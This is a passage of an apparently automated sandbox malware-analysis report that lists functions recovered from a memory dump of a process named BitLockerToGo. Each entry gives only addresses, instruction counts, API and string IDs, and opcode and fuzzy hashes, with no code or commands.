                                                                                                                                                                  • Opcode Fuzzy Hash: a493fac295bc14b8a8112019caaffbfb44c950fdc5e9c3460a93f1d75309ad6b
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C7116B1904200EBDB20AF18DC9267B73B5FF85354F094929E9968B791F7359B10C792
                                                                                                                                                                  Function 02D17430 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 2994545307-3962175265
                                                                                                                                                                  • Opcode ID: a031b02eccc5e4c0f6ed8faf235a455cb4fd6968c332e000cc71ac35b0e86d0f
                                                                                                                                                                  • Instruction ID: a60b574baa03082c5d9300a3ae6d68c796a2dddca0ec173170b9006f099b3f17
                                                                                                                                                                  • Opcode Fuzzy Hash: a031b02eccc5e4c0f6ed8faf235a455cb4fd6968c332e000cc71ac35b0e86d0f
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DA19E71A08340ABE724DA14E880BABFBE6EF85354F548C1CF985877A1E731DD54CB92
                                                                                                                                                                  Function 02CE0A8F Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $'&A
                                                                                                                                                                  • API String ID: 0-4044571954
                                                                                                                                                                  • Opcode ID: ed48141c18588aadb2b32d2ec7cb7802f9db96c2b03cf61bdaacfd89971a3e69
                                                                                                                                                                  • Instruction ID: b855159043f7ace82dfa32ce9631ba71862a4487b12a2c4a6c4478ef1d7eb1a3
                                                                                                                                                                  • Opcode Fuzzy Hash: ed48141c18588aadb2b32d2ec7cb7802f9db96c2b03cf61bdaacfd89971a3e69
                                                                                                                                                                  • Instruction Fuzzy Hash: 37A1747450C381EFD7509F64E894A2FBBF4EF8A345F405C2CF986862A0C33999A5CB56
                                                                                                                                                                  Function 02CDA660 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ,
                                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                                  • Opcode ID: 129af97c038985748504d2b0268a372820b4b7d79b33b12e41ae6672a9c550e5
                                                                                                                                                                  • Instruction ID: 83fcb9e463279bd25a7fb0ac4cc5bc11abb2b8d337f2f88d4e54069cba8359b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 129af97c038985748504d2b0268a372820b4b7d79b33b12e41ae6672a9c550e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB149712093819FD325CF28C88061BFBE0AFA9704F444E6DE5D997382D631EA18CB67
                                                                                                                                                                  Function 02CFDE01 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: 4711e6f3502bc5c0a3bb1edd4a88a7aea634246c4c6c5089f6033841747b7938
                                                                                                                                                                  • Instruction ID: afd34dbb32889bcb876ed4aff36f263af44989e4308b8961e52fb13e285516e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4711e6f3502bc5c0a3bb1edd4a88a7aea634246c4c6c5089f6033841747b7938
                                                                                                                                                                  • Instruction Fuzzy Hash: 30718DB8D003168FDB60CF94D880BAEB7F1FF4A304F144858EA45AB3A1E735AA54CB51
                                                                                                                                                                  Function 02D0EA50 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: 863fabd038c25867fdae73cbf1ff8a22daa214b0dc3df915e7b0a8d4c25ed17f
                                                                                                                                                                  • Instruction ID: 330d552dbd180cba6a5f1fb40cd0e21b7ade2ad84631f3376771c153cf9cd92d
                                                                                                                                                                  • Opcode Fuzzy Hash: 863fabd038c25867fdae73cbf1ff8a22daa214b0dc3df915e7b0a8d4c25ed17f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3451D371A48240AFE724EE64E884B3AB7E6EB99305F550C1CF5C587391D772DC24CB62
                                                                                                                                                                  Function 02D17210 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: 0c6e0f798519f765f02a846cfcf175bf4152366842918be54c0e719e87df29ea
                                                                                                                                                                  • Instruction ID: ea564d33afba250b3117cc34eb2d6d099dd33e650a63cbbc128b467fc7f104fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c6e0f798519f765f02a846cfcf175bf4152366842918be54c0e719e87df29ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F510A71648250ABE3259E18E890B2EF7E2FF85314F69892CE8E5577A0C331EC11C792
                                                                                                                                                                  Function 02D12F90 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 2994545307-4108050209
                                                                                                                                                                  • Opcode ID: ec9feadaabfc9b3b27ecf9c1fac4e33abd074786b6b14e6d48e7e6c711f5123e
                                                                                                                                                                  • Instruction ID: 7adffd2c15b62f2d6f09f99aabfbff9fc65120c440493adfa92e0f105e004991
                                                                                                                                                                  • Opcode Fuzzy Hash: ec9feadaabfc9b3b27ecf9c1fac4e33abd074786b6b14e6d48e7e6c711f5123e
                                                                                                                                                                  • Instruction Fuzzy Hash: 717114B5608340ABD764DF08E890B2BBBE6FB89304F54495CF9C587791C375E854CBA2
                                                                                                                                                                  Function 02D184C0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: qrs
                                                                                                                                                                  • API String ID: 0-4213175
                                                                                                                                                                  • Opcode ID: 4dba6cb22d50bf8d36682aeadcd836cb7de4e385e078b0abf82d305925f3a70a
                                                                                                                                                                  • Instruction ID: 281b29ca0d8c8f39655e8b0cf752c85a271b2a31cff4e193ddf90d2a6caf8d4a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4dba6cb22d50bf8d36682aeadcd836cb7de4e385e078b0abf82d305925f3a70a
                                                                                                                                                                  • Instruction Fuzzy Hash: C561BB75A0C240DFD354DF28E49091AB7F6FB8A311F0A88ACD98997711D338EC64DB51
                                                                                                                                                                  Function 02D0E000 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 2994545307-3962175265
                                                                                                                                                                  • Opcode ID: 075b01847aaf26028216fc35fcf8806ff781ebfab1ce3c405fb436bf780cd9fc
                                                                                                                                                                  • Instruction ID: 278b0de5fa6bbb46e28543b8eec46c6bf79dd86cd104560134ac20f7e820ae89
                                                                                                                                                                  • Opcode Fuzzy Hash: 075b01847aaf26028216fc35fcf8806ff781ebfab1ce3c405fb436bf780cd9fc
                                                                                                                                                                  • Instruction Fuzzy Hash: 99518F74A4C200ABE715AF14E8C0A2AF7E6EF95355F588C1CE9C5973A1D371EC24CB62
                                                                                                                                                                  Function 02D19060 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                  • Opcode ID: a99658966ae7f80d31aac099f9afbb900683e9f3e6b07c0eeb4ffa0c0241ef50
                                                                                                                                                                  • Instruction ID: a9fd5282cac26f2b4d67008f3226eb7e25920b67ad7237f6f0a82acedb15e48a
                                                                                                                                                                  • Opcode Fuzzy Hash: a99658966ae7f80d31aac099f9afbb900683e9f3e6b07c0eeb4ffa0c0241ef50
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A41DCB1508300AFD7109F64E8A5B6BB7E5EF85318F18881DE5898B3A1E375C914CB52
                                                                                                                                                                  Function 02D19960 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                  • Opcode ID: ac39f9a6cc35ebd249f6bbc80df422481c94defba8c07287ae9341178e87a43c
                                                                                                                                                                  • Instruction ID: 7919c35adf3958f306ee051ae5bad0cce408aa274278c675a2d4fe52272d55ec
                                                                                                                                                                  • Opcode Fuzzy Hash: ac39f9a6cc35ebd249f6bbc80df422481c94defba8c07287ae9341178e87a43c
                                                                                                                                                                  • Instruction Fuzzy Hash: 54316970909200ABD310DF14E4A0A6BFBF9FF9A318F14992CE5C897790E335D918CB66
                                                                                                                                                                  Function 02CDBCD0 Relevance: .8, Instructions: 782COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0641d765868be0eb934f823910522f3d33c24183e458b1c7c04f70280b1ebfd0
                                                                                                                                                                  • Instruction ID: 9322f9885b56c2e75f1aea122089d6cc6f796fe417207fb1046c1302c814948b
                                                                                                                                                                  • Opcode Fuzzy Hash: 0641d765868be0eb934f823910522f3d33c24183e458b1c7c04f70280b1ebfd0
                                                                                                                                                                  • Instruction Fuzzy Hash: 4942D4316083158BC725DF19D8803BEB3E2FFC4718F19892EDA9697285D735EA51CB82
                                                                                                                                                                  Function 02CF2AA0 Relevance: .7, Instructions: 681COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c381fa36c5bc9b07039ae166a9c0be2e2a170b7c5cc357c945c48d720f0d9494
                                                                                                                                                                  • Instruction ID: bb41904e55342ef75cbdb43431e2d4d7910b115a133d33422933918db561a9a9
                                                                                                                                                                  • Opcode Fuzzy Hash: c381fa36c5bc9b07039ae166a9c0be2e2a170b7c5cc357c945c48d720f0d9494
                                                                                                                                                                  • Instruction Fuzzy Hash: CD72E7B0508B819ED371CF3C8948787BFE5AB1A314F444A9DE0EE8B792D3756505CB62
                                                                                                                                                                  Function 02CDB1C0 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 21239d803694c18d44292852bfcf32c35572c0fc2c412d04e0200f7bb212b936
                                                                                                                                                                  • Instruction ID: 3d0795f4fc17bab9496bfaf12371507256b7b6cab586ec807897265279ab7dd9
                                                                                                                                                                  • Opcode Fuzzy Hash: 21239d803694c18d44292852bfcf32c35572c0fc2c412d04e0200f7bb212b936
                                                                                                                                                                  • Instruction Fuzzy Hash: FE52F9709087888FE734CB24C4847A7BBE1EF81318F16492ED6EB06B82D779E985C755
                                                                                                                                                                  Function 02CD7150 Relevance: .7, Instructions: 657COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1df4e4be7ba248b1ad4f2d7fb984b85423205a1a5e8fa6ca5bef0be816eb7a4b
                                                                                                                                                                  • Instruction ID: f1c67cd2c8cc3b90dceabb2fb318011f9efcff6994cc6c910f35490221a746ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 1df4e4be7ba248b1ad4f2d7fb984b85423205a1a5e8fa6ca5bef0be816eb7a4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 2252CE315083458FCB15CF29C0806AAFBE1BFC8318F598A6EE9995B341D774E989CB81
                                                                                                                                                                  Function 02CE51BD Relevance: .6, Instructions: 642COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9a63e3f7b3aa3187bece710034b5b288749fed9e00839a78e0bde3f8950479a2
                                                                                                                                                                  • Instruction ID: dcefe4bfbe783d84d42b60473530cc1ca95257f5b9e639e3d0bd430879d6ad45
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a63e3f7b3aa3187bece710034b5b288749fed9e00839a78e0bde3f8950479a2
                                                                                                                                                                  • Instruction Fuzzy Hash: E21266B46102409FD7358F28C880B26BBF2FF4A349F64484CE5C68B752E736A855CBA5
                                                                                                                                                                  Function 02CD7B50 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 87fa853598bdec29490406eb9f83ceec2725ac5b2eca457e76a53c10aa1b919a
                                                                                                                                                                  • Instruction ID: b11c19662ad4b167e4c4cf67a76376a8cfa2aa853e19cd0d2dae17358758a597
                                                                                                                                                                  • Opcode Fuzzy Hash: 87fa853598bdec29490406eb9f83ceec2725ac5b2eca457e76a53c10aa1b919a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1532F070514B118FC378CF29C59066AFBF2BB85610B944A2ED6A78BF90D736F849CB50
                                                                                                                                                                  Function 02CDA110 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 45f40516d03e080300a34607671a2b77a14a68e7507698c8e96b957cbf3b1539
                                                                                                                                                                  • Instruction ID: a92705f6589387dd7daa9736dab1150a7df948d2b7695cf92c09e1eaa52fae4b
                                                                                                                                                                  • Opcode Fuzzy Hash: 45f40516d03e080300a34607671a2b77a14a68e7507698c8e96b957cbf3b1539
                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF1CC366087418FC724CF29C88076BFBE2AFC9204F08982DE5D987751EB75E945CB96
                                                                                                                                                                  Function 02D16720 Relevance: .4, Instructions: 441COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c7694968fa1101342b7e41153b1a6defc0a20dcd979e0de0e8264e9ad2da8954
                                                                                                                                                                  • Instruction ID: 9f5ef8763513f1d89c96e13c22ba05d41e2e91fcafdd3638afa8137e4da482f7
                                                                                                                                                                  • Opcode Fuzzy Hash: c7694968fa1101342b7e41153b1a6defc0a20dcd979e0de0e8264e9ad2da8954
                                                                                                                                                                  • Instruction Fuzzy Hash: 26F12232A1C241DFC724CF28E49052AB7E6FF99314F1A8AADD49887381D739DD65CB81
                                                                                                                                                                  Function 02CFC75E Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4fd1e58d1dbabd116fcf9804dc0aadbf9641abe8526d6686ff306a217fcc661f
                                                                                                                                                                  • Instruction ID: 5b7b1597d4647a9495e68893cf7f7dc7aac51945a0f708ca48ddc80c2e3638ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd1e58d1dbabd116fcf9804dc0aadbf9641abe8526d6686ff306a217fcc661f
                                                                                                                                                                  • Instruction Fuzzy Hash: C4D13931A48385CFD364CF38D89076AB7E2AF96310F198A6DE6A5473D1D731DA58CB01
                                                                                                                                                                  Function 02CF74AA Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 651177f851fbc3092b012b7070e4bef738d89b19f216cdc1eeca923fc0c3aa3d
                                                                                                                                                                  • Instruction ID: ed9de7c897bee1ebf8f728b1b3b5bcff4c5d27df1ceb3c5229f027bf8bfde6c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 651177f851fbc3092b012b7070e4bef738d89b19f216cdc1eeca923fc0c3aa3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BC1E075918351DFC3A58F28D890A2AF7E2FF95315F49892CE9D18B390D334E869CB81
                                                                                                                                                                  Function 02CFB5B0 Relevance: .4, Instructions: 376COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 7396e93ae33e5b22ebe9eef3f46821f30ba0818aae7b4b8fd08e53a39f49e754
                                                                                                                                                                  • Instruction ID: 2ba965ca400fe868079fb4f8352eb8fe25d3758dddf24fe09eb267ddb4777e9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7396e93ae33e5b22ebe9eef3f46821f30ba0818aae7b4b8fd08e53a39f49e754
                                                                                                                                                                  • Instruction Fuzzy Hash: A1B1F1716083059BD7949F15C89072BB7E2EFD9358F18492CEACA8B391E735EE04CB52
                                                                                                                                                                  Function 02D17800 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8aca2378bba58e80f9ff25dabdfb1e58a52b813a387e63c464d9c63657b1c144
                                                                                                                                                                  • Instruction ID: d8452aa466f8bb04eaa0f67e8c3562fb3fc1ca82f1f09b629083f877dabdfa7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 8aca2378bba58e80f9ff25dabdfb1e58a52b813a387e63c464d9c63657b1c144
                                                                                                                                                                  • Instruction Fuzzy Hash: 54B1C371A083406BE714DA19EC40B6BF7E6EBC4718F08492DE998D7765EB34DD04CB52
                                                                                                                                                                  Function 02CDAD20 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6b0590869f7e472a4fc1840ce596b24efcccd291cbc8f73edd6f1921e6473e09
                                                                                                                                                                  • Instruction ID: 531efb59002d29fd0671224b9efbbd4811e4b26047c205f140755f694b246822
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b0590869f7e472a4fc1840ce596b24efcccd291cbc8f73edd6f1921e6473e09
                                                                                                                                                                  • Instruction Fuzzy Hash: FCC14BB2A487418FC360CF68DC86B9BB7E1FB85318F09892CD299C7341E779A155CB45
                                                                                                                                                                  Function 02D188F6 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8e7193350ecfcd91a8b24fbb30b7ded7fc03a59529d9d29c52b2846a1f5f0760
                                                                                                                                                                  • Instruction ID: 6f28b9b148476221cf0b65b98d2f73fcb6a8946b5ef985680cca921b3e971e41
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e7193350ecfcd91a8b24fbb30b7ded7fc03a59529d9d29c52b2846a1f5f0760
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AA1CE32E59106DBCB18CF68E4816AEBBF2FB4A314F198569D845E7381C738DD50CB90
                                                                                                                                                                  Function 02D19D50 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
